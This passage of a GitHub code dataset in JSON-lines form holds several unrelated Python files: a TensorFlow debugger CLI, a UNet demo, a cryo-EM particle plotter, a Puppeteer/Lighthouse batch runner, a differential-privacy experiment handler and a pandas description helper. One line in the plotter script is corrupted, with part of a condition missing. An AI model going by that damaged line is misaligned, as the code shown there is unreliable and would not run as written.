recipients) of a node.\n\n    Args:\n      neighbor_type: (\"input\" | \"recipient\")\n      non_ctrls: Non-control neighbor node names, as a list of str.\n      ctrls: Control neighbor node names, as a list of str.\n\n    Returns:\n      A RichTextLines object.\n    \"\"\"\n\n    # TODO(cais): Return RichTextLines instead, to allow annotation of node\n    # names.\n    lines = []\n    font_attr_segs = {}\n\n    lines.append(\"\")\n    lines.append(\" %d %s(s) + %d control %s(s):\" %\n                 (len(non_ctrls), neighbor_type, len(ctrls), neighbor_type))\n    lines.append(\" %d %s(s):\" % (len(non_ctrls), neighbor_type))\n    for non_ctrl in non_ctrls:\n      line = \" [%s] %s\" % (self._debug_dump.node_op_type(non_ctrl),\n                           non_ctrl)\n      lines.append(line)\n      font_attr_segs[len(lines) - 1] = [(\n          len(line) - len(non_ctrl), len(line),\n          debugger_cli_common.MenuItem(None, \"ni -a -d -t %s\" % non_ctrl))]\n\n    if ctrls:\n      lines.append(\"\")\n      lines.append(\" %d control %s(s):\" % (len(ctrls), neighbor_type))\n      for ctrl in ctrls:\n        line = \" [%s] %s\" % (self._debug_dump.node_op_type(ctrl), ctrl)\n        lines.append(line)\n        font_attr_segs[len(lines) - 1] = [(\n            len(line) - len(ctrl), len(line),\n            debugger_cli_common.MenuItem(None, \"ni -a -d -t %s\" % ctrl))]\n\n    return debugger_cli_common.RichTextLines(\n        lines, font_attr_segs=font_attr_segs)\n\n  def _list_node_attributes(self, node_name):\n    \"\"\"List the attributes of a node.\n\n    Args:\n      node_name: Name of the node of which the attributes are to be listed.\n\n    Returns:\n      A RichTextLines object.\n    \"\"\"\n\n    lines = []\n    lines.append(\"\")\n    lines.append(\"Node attributes:\")\n\n    attrs = self._debug_dump.node_attributes(node_name)\n    for attr_key in attrs:\n      lines.append(\" %s:\" % attr_key)\n      attr_val_str = repr(attrs[attr_key]).strip().replace(\"\\n\", \" \")\n      lines.append(\" %s\" % attr_val_str)\n      lines.append(\"\")\n\n    return debugger_cli_common.RichTextLines(lines)\n\n  def _list_node_dumps(self, node_name):\n    \"\"\"List dumped tensor data from a node.\n\n    Args:\n      node_name: Name of the node whose dumped tensors are to be listed.\n\n    Returns:\n      A RichTextLines object.\n    \"\"\"\n\n    lines = []\n    font_attr_segs = {}\n\n    watch_keys = self._debug_dump.debug_watch_keys(node_name)\n\n    dump_count = 0\n    for watch_key in watch_keys:\n      debug_tensor_data = self._debug_dump.watch_key_to_data(watch_key)\n      for datum in debug_tensor_data:\n        line = \" Slot %d @ %s @ %.3f ms\" % (\n            datum.output_slot, datum.debug_op,\n            (datum.timestamp - self._debug_dump.t0) / 1000.0)\n        lines.append(line)\n        command = \"pt %s:%d -n %d\" % (node_name, datum.output_slot, dump_count)\n        font_attr_segs[len(lines) - 1] = [(\n            2, len(line), debugger_cli_common.MenuItem(None, command))]\n        dump_count += 1\n\n    output = debugger_cli_common.RichTextLines(\n        lines, font_attr_segs=font_attr_segs)\n    output_with_header = debugger_cli_common.RichTextLines(\n        [\"%d dumped tensor(s):\" % dump_count, \"\"])\n    output_with_header.extend(output)\n    return output_with_header\n\n\ndef create_analyzer_ui(debug_dump,\n                       tensor_filters=None,\n                       ui_type=\"readline\",\n                       on_ui_exit=None,\n                       config=None):\n  \"\"\"Create an instance of ReadlineUI based on a DebugDumpDir object.\n\n  Args:\n    debug_dump: (debug_data.DebugDumpDir) The debug dump to use.\n    tensor_filters: (dict) A dict mapping tensor filter name (str) to tensor\n      filter (Callable).\n    ui_type: (str) requested UI type, only \"readline\" is supported.\n    on_ui_exit: (`Callable`) the callback to be called when the UI exits.\n    config: A `cli_config.CLIConfig` object.\n\n  Returns:\n    (base_ui.BaseUI) A BaseUI 
subtype object with a set of standard analyzer\n    commands and tab-completions registered.\n  \"\"\"\n  if config is None:\n    config = cli_config.CLIConfig()\n\n  analyzer = DebugAnalyzer(debug_dump, config=config)\n  if tensor_filters:\n    for tensor_filter_name in tensor_filters:\n      analyzer.add_tensor_filter(\n          tensor_filter_name, tensor_filters[tensor_filter_name])\n\n  cli = ui_factory.get_ui(ui_type, on_ui_exit=on_ui_exit, config=config)\n  cli.register_command_handler(\n      \"list_tensors\",\n      analyzer.list_tensors,\n      analyzer.get_help(\"list_tensors\"),\n      prefix_aliases=[\"lt\"])\n  cli.register_command_handler(\n      \"node_info\",\n      analyzer.node_info,\n      analyzer.get_help(\"node_info\"),\n      prefix_aliases=[\"ni\"])\n  cli.register_command_handler(\n      \"list_inputs\",\n      analyzer.list_inputs,\n      analyzer.get_help(\"list_inputs\"),\n      prefix_aliases=[\"li\"])\n  cli.register_command_handler(\n      \"list_outputs\",\n      analyzer.list_outputs,\n      analyzer.get_help(\"list_outputs\"),\n      prefix_aliases=[\"lo\"])\n  cli.register_command_handler(\n      \"print_tensor\",\n      analyzer.print_tensor,\n      analyzer.get_help(\"print_tensor\"),\n      prefix_aliases=[\"pt\"])\n  cli.register_command_handler(\n      \"print_source\",\n      analyzer.print_source,\n      analyzer.get_help(\"print_source\"),\n      prefix_aliases=[\"ps\"])\n  cli.register_command_handler(\n      \"list_source\",\n      analyzer.list_source,\n      analyzer.get_help(\"list_source\"),\n      prefix_aliases=[\"ls\"])\n  cli.register_command_handler(\n      \"eval\",\n      analyzer.evaluate_expression,\n      analyzer.get_help(\"eval\"),\n      prefix_aliases=[\"ev\"])\n\n  dumped_tensor_names = []\n  for datum in debug_dump.dumped_tensor_data:\n    dumped_tensor_names.append(\"%s:%d\" % (datum.node_name, datum.output_slot))\n\n  # Tab completions for command \"print_tensor\".\n  cli.register_tab_comp_context([\"print_tensor\", \"pt\"], dumped_tensor_names)\n\n  return cli\n","repo_name":"tensorflow/tensorflow","sub_path":"tensorflow/python/debug/cli/analyzer_cli.py","file_name":"analyzer_cli.py","file_ext":"py","file_size_in_byte":57643,"program_lang":"python","lang":"en","doc_type":"code","stars":178918,"dataset":"github-code","pt":"18"}
+{"seq_id":"28467815832","text":"# -*- coding: utf-8 -*-\n'''\nDescription: structure of Unet\n'''\nfrom model_parts import *\nimport torch\nfrom torch import optim\n\n\nclass UNet(nn.Module):\n def __init__(self, n_channels, n_classes):\n super(UNet, self).__init__()\n\n #进行下采样\n self.inc = inconv(n_channels, 16) \n self.down1 = down(16, 32) \n self.down2 = down(32, 64) \n self.down3 = down(64, 128) \n self.down4 = down(128, 128) \n\n #进行上采样\n self.up1 = up(256, 64, 128) \n self.up2 = up(128, 32, 64) \n self.up3 = up(64, 16, 32) \n self.up4 = up(32, 16, 16) \n self.outc = outconv(16, n_classes)\n\n ##网络前向传播\n def forward(self, x_raw):\n\n x1 = self.inc(x_raw)\n x2 = self.down1(x1)\n x3 = self.down2(x2)\n x4 = self.down3(x3)\n x5 = self.down4(x4)\n\n x = self.up1(x5, x4)\n x = self.up2(x, x3)\n x = self.up3(x, x2)\n x = self.up4(x, x1)\n x = self.outc(x)\n\n return x\n\n ###网络参数初始化,此处使用凯明分布\n def weight_init(self):\n for m in self._modules:\n weights_init_kaiming(m)\n\n\ndef weights_init_kaiming(m):\n class_name = m.__class__.__name__\n if class_name.find('Linear') != -1:\n torch.nn.init.kaiming_normal_(m.weight) # 利用凯明均匀分布来进行初始化\n if m.bias is not None:\n m.bias.data.zero_()\n elif class_name.find('Conv2d') != -1:\n torch.nn.init.kaiming_normal_(m.weight)\n if m.bias is not None:\n m.bias.data.zero_()\n elif class_name.find('ConvTranspose2d') != -1:\n torch.nn.init.kaiming_normal_(m.weight)\n if m.bias is not None:\n m.bias.data.zero_()\n elif class_name.find('Norm') != -1:\n m.weight.data.normal_(1.0, 0.02)\n if m.bias is not None:\n m.bias.data.zero_()\n\nif __name__ == '__main__':\n\n UNet_model = UNet(3, 1) # 输入数据的channel为3,输出数据的channel为1\n optimizer = optim.Adam(UNet_model.parameters(), lr=0.001, weight_decay=0.0001)\n loss_func = nn.MSELoss(reduction='sum')\n train_loss = 0\n\n #进行100次模拟训练\n for i in range(100):\n ##模拟训练数据\n img = torch.rand(2, 3, 600, 600)\n ##模拟真实值\n label = torch.rand(2, 1, 600, 600)\n #模型前向传播计算\n img_pred = UNet_model(img)\n loss = loss_func(label, img_pred)\n\n ##优化器反向传播操作\n optimizer.zero_grad()\n loss.backward()\n optimizer.step()##更新权重\n train_loss += loss\n\n #每训练10次便记录一次误差值\n if i % 10 == 0:\n print(\"iter:{},loss:{}\".format(i, train_loss / 10))\n train_loss = 0\n\n\n","repo_name":"TianyiXiong1998/Projects-Repository","sub_path":"CU-net/Unet.py","file_name":"Unet.py","file_ext":"py","file_size_in_byte":2793,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"}
+{"seq_id":"8483141404","text":"import cv2\nimport sys, os,getopt \nfrom mpi4py import MPI\nfrom EMAN2 import *\nimport numpy as np\ndef readStar(fin):\n f=open(fin,'r');\n l=f.readlines();\n count=0;\n for r in l:\n s=r.split();\n if len(s)>1:\n c=s[0][1];\n if c.isdigit()==1:\n break;\n count=count+1;\n else:\n count=count+1;\n\n l=l[count:];\n\n return l;\n\n\n\ndef normImg(img,n):\n imax=np.max(img);\n imin=np.min(img);\n a=float(255)/(imax-imin);\n b=(-1)*a*imin;\n\n sizex=img.shape[0];\n sizey=img.shape[1];\n arr=np.zeros([sizex,sizey]);\n arr=np.round(a*img+b).astype(int);\n\n amax=np.max(arr);\n amin=np.min(arr);\n amean=np.mean(arr);\n astd=np.std(arr);\n\n bmin=amean-astd*n;\n bmax=amean+astd*n;\n c=float(255)/(bmax-bmin);\n d=(-1)*c*bmin;\n\n arr2=np.round(c*arr+d).astype(int);\n for x in range(0,sizex):\n for y in range(0,sizey):\n if arr2[x,y]<0:\n arr2[x,y]=0;\n elif arr2[x,y]>255:\n arr2[x,y]=255;\n\n arr3=np.zeros([sizex,sizey,3]);\n arr3[:,:,0]=arr2[:,:];\n arr3[:,:,1]=arr2[:,:];\n arr3[:,:,2]=arr2[:,:];\n\n return arr3;\n\ndef norm(fin,n):\n em=EMData(fin);\n img=EMNumPy.em2numpy(em);\n arr2=normImg(img,n);\n return arr2;\n\ndef drawOri(im,cx,cy, sx,sy,count):\n startx=cx-sx/2;\n starty=cy-sx/2;\n endx=cx+sx/2;\n endy=cy+sx/2;\n\n cv2.rectangle(im, (startx, starty), (endx, endy), (255,0,0), 2)\n\ndef draw(im,cx,cy, sx,sy,r,g,b,shape,r1,g1,b1):\n startx=cx-sx/2;\n starty=cy-sx/2;\n endx=cx+sx/2;\n endy=cy+sx/2;\n\n w=3;\n\n if shape==0:\n cv2.rectangle(im, (startx, starty), (endx, endy), (b,g,r), w)\n elif shape==1:\n cv2.circle(im,(cx,cy), sx/2, (b,g,r), w)\n elif shape==2:\n cv2.rectangle(im, (startx, starty), (endx, endy), (b,g,r), w)\n cv2.circle(im,(cx,cy), 10, (b1,g1,r1), w)\n\ndef getCors(fstar):\n f=open(fstar,'r');\n plist=f.readlines();\n plist=plist[6:]\n return plist;\n\n\ndef drawOne(fin,fstar,pSize,fout,start,stop, step,shape,arrColor,color):\n plist=readStar(fstar);\n\n if(fin[-3:]=='png'):\n im = cv2.imread(fin);\n elif (fin[-3:]=='mrc'):\n im=norm(fin,2);\n \n sx=pSize;\n sy=pSize;\n\n sizex,sizey,sizez=im.shape;\n\n count=0;\n cx=0;\n cy=0;\n \n index=0;\n p=cp=0;\n for line in plist:\n if count>=start and count1:\n x=float(s[0]);\n x=int(x);\n y=float(s[1]);\n y=int(y);\n\n if len(s)>=3:\n p=float(s[2])\n else:\n p=1;\n\n if len(s)==4:\n cp=float(s[3]);\n else:\n cp=0;\n\n if color==-1:\n index=int((count-20)/step);\n if index<0:\n index=0;\n elif index>9:\n index=9;\n else:\n index=int(color);\n\n r,g,b=arrColor[index]\n\n if color==-1:\n cdex=int((cp-0.5)*10);\n if cdex<0:\n cdex=0;\n else:\n cdex=int(color);\n r1,g1,b1=arrColor[cdex];\n\n draw(im,x,y,sx,sy,r,g,b,shape,r1,g1,b1);\n count=count+1;\n \n cv2.imwrite(fout,im);\n\n\ndef usage():\n print(\"mpiexec -n 6 -i /home/ict/dataset/objEmDb/experiment/empiar10005/data2 \\\n -o /home/ict/dataset/objEmDb/experiment/empiar10005/rec \\\n -s /home/ict/dataset/objEmDb/experiment/empiar10005/autopick-results-by-demo-type3-iter1-2 \\\n -p 200 -d\");\n\nif __name__==\"__main__\":\n opts, args = getopt.getopt(sys.argv[1:], \"i:o:s:p:z:q:c:n:f:e:dmh\") \n din=\"\" \n dout=\"\"\n dstar=\"\"\n pSize=0;\n isDir=0;\n shape=0;\n isMrc=-1;\n start=30;\n step=10;\n color=-1;\n stop=200000;\n\n for op, value in opts: \n if op == \"-i\": \n din = value \n elif op == \"-o\": \n dout = value\n elif op ==\"-s\":\n dstar= value;\n elif op ==\"-p\":\n pSize=int(value)\n elif op ==\"-z\":\n start=float(value)\n elif op ==\"-e\":\n stop=float(value)\n elif op ==\"-c\":\n step=int(value)\n elif op ==\"-q\":\n color=int(value)\n 
elif op ==\"-f\":\n shape=int(value)\n elif op==\"-d\":\n isDir=1\n elif op==\"-m\":\n isMrc=1\n elif op==\"-n\":\n dnum=int(value);\n elif op == \"-h\": \n usage() \n din='/home/ict/pickyEye/empiar10075/relion/pickyEye/empiar10075/data/FoilHole_19046908_Data_19046157_19046158_20140520_0021_frames_SumCorr.png'\n dstar='/home/ict/pickyEye/empiar10075/relion/pickyEye/empiar10075/star/FoilHole_19046908_Data_19046157_19046158_20140520_0021_frames_SumCorr.star';\n dout='./test.png'\n start=50;\n step=10;\n shape=1;\n pSize=300;\n\n a=np.zeros([27,3]);\n index =0;\n \n a[0]=255,0,0;\n a[1]=0,0,255;\n a[2]=0,255,0;\n a[3]=255,0,255;\n a[4]=0,255,255;\n a[5]=255,255,0;\n a[6]=75,0,130;\n a[7]=0,100,0;\n a[8]=128,0,0;\n a[9]=128,128,0;\n a[10]=0,0,0;\n print(din,dout,dstar,pSize);\n if isDir ==1:\n comm=MPI.COMM_WORLD\n crank=comm.Get_rank();\n csize=comm.Get_size();\n\n if crank==0:\n if os.path.isdir(dout)==0:\n os.mkdir(dout);\n comm.barrier();\n\n\n fins=os.listdir(dstar);\n for i in range(crank,len(fins),csize):\n f=fins[i];\n if f[-4:]=='star' :\n fin=f[:-5]+'.png';\n fin=os.path.join(din,fin);\n\n if os.path.exists(fin)==0:\n fin=f[:-5]+'.mrc';\n fin=os.path.join(din,fin);\n if os.path.exists(fin)==1:\n fstar=os.path.join(dstar,f);\n fout=f[:-5]+'.png';\n fout=os.path.join(dout,fout);\n if os.path.exists(fstar)==1:\n print(fstar, fin);\n drawOne(fin,fstar,pSize,fout,start,stop, step, shape,a,color);\n else:\n print('no file:', fin);\n\n comm.barrier();\n else:\n drawOne(din,dstar,pSize,dout,start, step, shape,a,color);\n","repo_name":"smart111/PIXER","sub_path":"color.py","file_name":"color.py","file_ext":"py","file_size_in_byte":6618,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"}
+{"seq_id":"19995945799","text":"#!/usr/bin/env python3\nimport datetime\nimport glob\nimport logging\nimport os\nimport subprocess\nimport sys\nimport tarfile\n\nimport ncscli.batchRunner as batchRunner\n\n\nclass PuppeteerLighthouseFrameProcessor(batchRunner.frameProcessor):\n '''defines details for using Puppeteer and Lighthouse to analyze a web page from multiple devices'''\n\n def installerCmd( self ):\n return 'apt-get -qq update > /dev/null && apt-get -qq install -y chromium nodejs npm > /dev/null && ln -s chromium /usr/bin/chromium-browser && PUPPETEER_SKIP_DOWNLOAD=yes npm install --quiet -g puppeteer && npm install --quiet -g lighthouse@6.5.0'\n\n PuppeteerFilePath = 'Puppeteer.js'\n\n def frameOutFileName( self, frameNum ):\n return 'Puppeteer_results_%03d.tar.gz' % frameNum\n\n def frameCmd( self, frameNum ):\n cmd = 'date && export NODE_PATH=/usr/local/lib/node_modules && export PATH=$PATH:/usr/local/bin && node %s && lighthouse https://www.google.com --no-enable-error-reporting --chrome-flags=\"--headless --no-sandbox\" --emulated-form-factor=none --throttling-method=provided && mv google.png google_%03d.png && mv *google*.html google_%03d.html && tar -zcvf Puppeteer_results_%03d.tar.gz google*' % (\n self.PuppeteerFilePath, frameNum, frameNum, frameNum\n )\n return cmd\n\ndef untarResults( outDataDir ):\n tarFilePaths = glob.glob( outDataDir+'/Puppeteer_results_*.tar.gz' )\n for tarFilePath in tarFilePaths:\n with tarfile.open( tarFilePath, 'r' ) as tarFile:\n try:\n tarFile.extractall( path=outDataDir )\n except Exception as exc:\n logger.warning( 'could not untar %s; %s', tarFilePath, exc )\n\n\n# configure logger formatting\n#logging.basicConfig()\nlogger = logging.getLogger(__name__)\nlogFmt = '%(asctime)s %(levelname)s %(module)s %(funcName)s %(message)s'\nlogDateFmt = '%Y/%m/%d %H:%M:%S'\nformatter = logging.Formatter(fmt=logFmt, datefmt=logDateFmt )\nlogging.basicConfig(format=logFmt, datefmt=logDateFmt)\n#batchRunner.logger.setLevel(logging.DEBUG) # for more verbosity\n\ndateTimeTag = datetime.datetime.now().strftime( '%Y-%m-%d_%H%M%S' )\noutDataDir = 'data/puppeteer_' + dateTimeTag\n\ntry:\n rc = batchRunner.runBatch(\n frameProcessor = PuppeteerLighthouseFrameProcessor(),\n commonInFilePath = PuppeteerLighthouseFrameProcessor.PuppeteerFilePath,\n authToken = os.getenv( 'NCS_AUTH_TOKEN' ) or 'YourAuthTokenHere',\n encryptFiles=False,\n timeLimit = 80*60,\n instTimeLimit = 24*60,\n frameTimeLimit = 600,\n filter = '{ \"regions\": [\"usa\", \"india\"], \"dar\": \">= 99\", \"dpr\": \">=48\", \"ram\": \">=3800000000\", \"storage\": \">=2000000000\" }',\n outDataDir = outDataDir,\n startFrame = 1,\n endFrame = 5,\n nWorkers = 10,\n limitOneFramePerWorker = True,\n autoscaleMax = 2\n )\n if rc==0 and os.path.isfile( outDataDir +'/recruitLaunched.json' ):\n untarResults( outDataDir )\n rc2 = subprocess.call( [sys.executable, 'processPuppeteerOutput.py', '--dataDirPath', outDataDir],\n stdout=subprocess.DEVNULL )\n if rc2:\n logger.warning( 'processPuppeteerOutput exited with returnCode %d', rc2 )\n sys.exit( rc )\nexcept KeyboardInterrupt:\n logger.warning( 'an interuption occurred')\n","repo_name":"neocortix/ncscli","sub_path":"examples/batchMode/runBatchPuppeteerLighthouse.py","file_name":"runBatchPuppeteerLighthouse.py","file_ext":"py","file_size_in_byte":3308,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"18"}
+{"seq_id":"33973922937","text":"import os\nfrom pydoc import cli\nimport random\nimport math\nimport numpy as np\nimport csv\nimport pickle\nimport time as tm\nimport multiprocessing as mp\nimport datetime\nfrom dpsm.Client import Client, dotProduct, Fast_Client\nfrom dpsm.FDP_Server import FDP, calc_kernel_radius, FDP_Lazy,FDP_PF\nfrom dpsm.CDP_Server import CDP\n\n\n\ndef read_dict(input_path: str):\n with open(input_path, \"rb\") as f:\n dic = pickle.load(f)\n return dic\n\n\ndef get_args_dict(dataset, algorithm, k, l, gamma, seed=0, epsilon=1, n=None, m=None, select_method=None, noise=None, cutoff=None, s=None, beta=None, save=True, fast=False,e0_ratio=None):\n dic = dict()\n dic[\"dataset\"] = dataset\n dic[\"algorithm\"] = algorithm\n dic[\"k\"] = k\n dic[\"epsilon\"] = epsilon\n dic[\"gamma\"] = gamma\n dic[\"save\"] = save\n dic[\"seed\"] = seed\n dic[\"l\"] = l\n dic[\"fast\"] = fast\n dic[\"save\"] = save\n if m is not None:\n dic[\"m\"] = m\n if n is not None:\n dic[\"n\"] = n\n\n if algorithm == \"Greedy\":\n dic[\"select_method\"] = \"greedy\"\n if algorithm == \"CDP\":\n if select_method is None:\n raise ValueError(\"Error: Missing parameter: select_method.\")\n dic[\"select_method\"] = select_method\n if algorithm == \"FDP\":\n if noise is None:\n raise ValueError(\"Error: Missing parameter: noise.\")\n dic[\"noise\"] = noise\n if algorithm == \"FDP_Lazy\":\n if noise is None:\n raise ValueError(\"Error: Missing parameter: noise.\")\n if cutoff is None:\n raise ValueError(\"Error: Missing parameter: cutoff.\")\n dic[\"noise\"] = noise\n dic[\"cutoff\"] = cutoff\n if algorithm == \"FDP_PF\":\n if cutoff is None:\n raise ValueError(\"Error: Missing parameter: cutoff.\")\n if e0_ratio is None:\n raise ValueError(\"Error: Missing parameter: e0_ratio.\")\n dic[\"cutoff\"] = cutoff\n dic[\"e0_ratio\"]=e0_ratio\n return dic\n\n\nclass Handler:\n def __init__(self, MaxP=10, save_path=\"res.csv\", res_fields=None, check_fields=None) -> None:\n self.MaxP = MaxP\n self.Pcnt = 0\n self.q = mp.Queue()\n self.save_path = save_path\n self.res_fields = res_fields\n if res_fields is None:\n self.res_fields = [\"dataset\", \"algorithm\", \"utility_func\", \"l\", \"seed\", \"n\", \"m\", \"k\", \"gamma\", \"epsilon\",\n \"delta\",\"epsilon_0\", \"delta_0\", \"sigma\",\"epsilon_1\",\"epsilon_2\", \"radius\", \"select_method\", \"noise\",\"e0_ratio\",\n \"cutoff\", \"sol\", \"result\", \"time\",\"communication_cost\"]\n self.args = dict()\n self.check_fileds = check_fields\n if check_fields is None:\n self.check_fileds = [\"dataset\", \"algorithm\", \"l\", \"seed\", \"n\", \"m\", \"k\", \"gamma\", \"epsilon\",\"e0_ratio\",\n \"select_method\", \"noise\", \"cutoff\"]\n self.exist_args = set()\n\n try:\n with open(self.save_path, 'r', newline='') as csvfile:\n print('file exists')\n except:\n with open(self.save_path, 'w', newline='') as csvfile:\n writer = csv.DictWriter(csvfile, fieldnames=self.res_fields)\n writer.writeheader()\n\n with open(self.save_path) as f:\n d = csv.DictReader(f)\n cnt = 0\n for row in d:\n dd = dict()\n for key in self.check_fileds:\n if key == \"epsilon\" or key == \"gamma\":\n dd[key] = str(float(row[key]))\n else:\n dd[key] = row[key]\n self.exist_args.add(str(dd))\n\n def start(self, args):\n self.args = args.copy()\n self.start_work()\n\n def start_work(self):\n if \"epsilon\" not in self.args:\n self.args[\"epsilon\"] = 1\n if self.existed(self.args):\n print(\"ARGS EXISTED. 
STOP RUNNING.\")\n return\n\n self.exist_args.add(str(self.args))\n mp.Process(target=self.work, args=(self.args, self.q)).start()\n self.Pcnt += 1\n self.wait(self.MaxP)\n\n def existed(self, args):\n nargs = dict()\n # print(\"nb\")\n for key in self.check_fileds:\n nargs[key] = '' if key not in args else str(args[key])\n if key == \"epsilon\" or key == \"gamma\":\n nargs[key] = str(float(nargs[key]))\n print(str(nargs))\n return str(nargs) in self.exist_args\n\n def wait(self, minp=1):\n\n while self.Pcnt >= minp:\n a = self.q.get()\n if \"Exist\" in a:\n self.Pcnt -= 1\n continue\n if a[\"save\"]:\n with open(self.save_path, \"a\", newline='') as f:\n fileds = self.res_fields\n w = csv.DictWriter(\n f, extrasaction=\"ignore\", fieldnames=fileds)\n w.writerow(a)\n self.Pcnt -= 1\n print(self.Pcnt,\" process(es) left.\")\n\n def work(self, args, q):\n random.seed(1)\n np.random.seed(1)\n\n random.seed(args[\"seed\"])\n np.random.seed(args[\"seed\"])\n\n items = read_dict(args[\"items_path\"])\n users = read_dict(args[\"users_path\"])\n\n if \"n\" not in args:\n args[\"n\"] = len(users)\n args[\"m\"] = len(items)\n\n args[\"delta\"] = 1/(args[\"n\"]**1.5)\n\n partition = [i % args[\"l\"] for i in range(args[\"n\"])]\n selected_user = [(1 if i < args[\"n\"] else 0)\n for i in range(len(users))]\n\n # shuffle and partition data\n random.shuffle(partition)\n #\n random.shuffle(selected_user)\n cnt = 0\n num = -1\n users_data = [dict() for i in range(args[\"l\"])]\n for key in users.keys():\n num += 1\n if selected_user[num] == 0:\n continue\n users_data[partition[cnt]][key] = users[key]\n cnt += 1\n\n # create client\n clients = []\n for i in range(args[\"l\"]):\n if args[\"fast\"] is True:\n clients.append(Fast_Client(users_data[i], items, args))\n else:\n clients.append(Client(users_data[i], items, args))\n if self.args[\"algorithm\"] != \"Greedy\":\n self.calc_parameters(args)\n\n func = None\n if args[\"algorithm\"] == \"Greedy\":\n func = CDP\n elif args[\"algorithm\"] == \"FDP\":\n func = FDP\n elif args[\"algorithm\"] == \"CDP\":\n func = CDP\n elif args[\"algorithm\"] == \"FDP_Lazy\":\n func = FDP_Lazy\n elif args[\"algorithm\"] == \"FDP_PF\":\n func=FDP_PF\n print(args)\n if self.existed(args):\n args[\"Exist\"] = True\n print(\"ARGS ALREADY EXIST. 
STOP RUNNING.\")\n q.put(args)\n return\n sol, time,comm_cost = func(items, args, clients)\n benefits = 0\n if args[\"fast\"] is False:\n for client in clients:\n benefits += sum(client.user_benefits.values())\n else:\n for client in clients:\n benefits += client.user_benefits\n args[\"sol\"] = sol\n args[\"result\"] = benefits\n args[\"time\"] = time\n args[\"communication_cost\"]=comm_cost\n print(str(datetime.datetime.now()),\" done:\", args)\n q.put(args)\n\n def F(self, t, a, b, c):\n return (t*a)/(b-(c/(t-1)))\n\n def logjc(self, n):\n s = 0\n for i in range(n):\n s += math.log(i+1)\n return s\n\n def calc_parameters(self, args):\n\n e = args[\"epsilon\"]\n if args[\"algorithm\"] == \"CDP\":\n k = args[\"k\"]\n elif args[\"algorithm\"] == \"FDP\":\n k = args[\"k\"]*args[\"m\"]\n elif args[\"algorithm\"] == \"FDP_Lazy\":\n k = args[\"m\"]+(args[\"k\"]-1)*args[\"cutoff\"]\n elif args[\"algorithm\"] == \"FDP_PF\":\n k= args[\"k\"]*args[\"cutoff\"]\n\n d = args[\"delta\"]\n gamma = args[\"gamma\"]\n\n basic_e = e/k\n basic_d = d/k\n\n adv_d = d/2\n a = k/2\n b = math.sqrt(2*k*math.log(1/adv_d))\n c = -e\n delta = b*b-4*a*c\n\n adv_e = (-b+math.sqrt(delta))/(a+a)\n print(\"basic_e:\", basic_e, \"basic_d:\", basic_d)\n print(\"adv_e:\", adv_e, \"adv_d:\", adv_d)\n\n if basic_e > adv_e:\n args[\"epsilon_0\"] = basic_e\n args[\"delta_0\"] = basic_d\n else:\n args[\"epsilon_0\"] = adv_e\n args[\"delta_0\"] = adv_d/k\n\n args[\"delta_0\"] /= gamma\n if args[\"algorithm\"]== \"FDP_PF\":\n args[\"epsilon_1\"] = math.log(1 + (math.exp(args[\"epsilon_0\"]*args[\"e0_ratio\"]) - 1) / gamma)\n args[\"epsilon_2\"] =math.log(1 + (math.exp(args[\"epsilon_0\"]*(1-args[\"e0_ratio\"])) - 1) / gamma) \n \n args[\"epsilon_0\"] = math.log(\n 1 + (math.exp(args[\"epsilon_0\"]) - 1) / gamma)\n if args[\"algorithm\"] == \"FDP\" or args[\"algorithm\"] == \"FDP_Lazy\":\n a = k*args[\"gamma\"]*args[\"gamma\"]\n b = args[\"epsilon\"]\n c = math.log(1/args[\"delta\"])\n # print(a,b,c)\n d = 1+c/b\n sigma = math.sqrt(a/b*(2*math.sqrt(d*d-d)+2*d-1)/2)\n args[\"sigma\"] = sigma\n print(\"sigma:\", sigma)\n","repo_name":"tc2000731/code-dpsm","sub_path":"dpsm/handler.py","file_name":"handler.py","file_ext":"py","file_size_in_byte":9292,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"}
+{"seq_id":"42609092034","text":"import os\nimport shutil\nimport math\nimport numpy as np\nimport pandas as pd\nimport polars as pl\nfrom typing import List\nimport warnings\n\nfrom IPython.display import display, HTML\nimport plotly.graph_objects as go\nimport plotly.offline as py\nfrom plotly.subplots import make_subplots\n\nimport config\n\nHEIGHT_PLOT = 650\n\n\ndef describe_numeric(df, cols_num=None, percentiles=None, stats_nans=True):\n \"\"\"\n Describe numeric columns\n :param df: pandas data frame\n :param cols_num: numeric columns to describe, by default: identified automatically\n :param percentiles: percentiles to compute, default: [0.05, 0.25, 0.50, 0.75, 0.95]\n :return: pandas df with stats\n \"\"\"\n\n if isinstance(df, pd.Series) or isinstance(df, np.ndarray) or isinstance(df, list):\n df = pd.DataFrame({'value': df})\n\n if cols_num is None:\n cols_num = list(df.head(1).select_dtypes(include=['number']).columns)\n if percentiles is None:\n percentiles = [0.05, 0.25, 0.50, 0.75, 0.95, 0.98, 0.99]\n if len(cols_num) == 0:\n return None\n d_describe = df[cols_num].describe(percentiles=percentiles).T\n if stats_nans:\n d_describe['count_nan'] = df.isnull().sum()\n d_describe['prc_nan'] = 1 - d_describe['count'] / float(df.shape[0])\n return d_describe\n\n\ndef describe_categorical(df, cols=None):\n \"\"\"\n Describe categorical columns\n :param df: pandas data frame\n :param cols: categorical columns to describe, by default: identified automatically\n :return: pandas df with stats\n \"\"\"\n if cols is None:\n cols = list(df.head(1).select_dtypes(include=['object']).columns)\n if len(cols) == 0:\n return None\n d_describe = df[cols].astype('category').describe().T\n return d_describe\n\n\ndef describe_categorical_freq(x: pd.Series, name: str = None, max_show: int = 10, min_prc: float = 0.001):\n \"\"\"\n Describe series with categorical values (counts, frequency)\n :param x: series to describe\n :param name: name\n :param max_show: max values to show\n :param min_prc: minimum size (in %) for the category to show in stats\n :return: pandas df with stats\n \"\"\"\n if name is None:\n try:\n name = x.name\n except:\n name = 'value'\n tmp = pd.DataFrame({name: x})\n\n agg = tmp.groupby([name], dropna=False, as_index=True).agg({name: len}).rename(columns={name: 'count'})\n agg['percentage'] = agg['count'] / sum(agg['count'])\n agg.sort_values(['count'], ascending=False, inplace=True)\n agg.reset_index(drop=False, inplace=True)\n filter_out = (((agg['percentage'] < min_prc)\n & (pd.Series(range(len(agg))) > max_show))\n | (pd.Series(range(len(agg))) > max_show))\n agg = agg.loc[~filter_out, ]\n return agg\n\n\ndef display_descr_cat_freq(df, cols=None, skip_freq_cols=None, show_title=False):\n \"\"\"\n Describe categorical columns in dataframe (counts, frequency)\n :param df: data 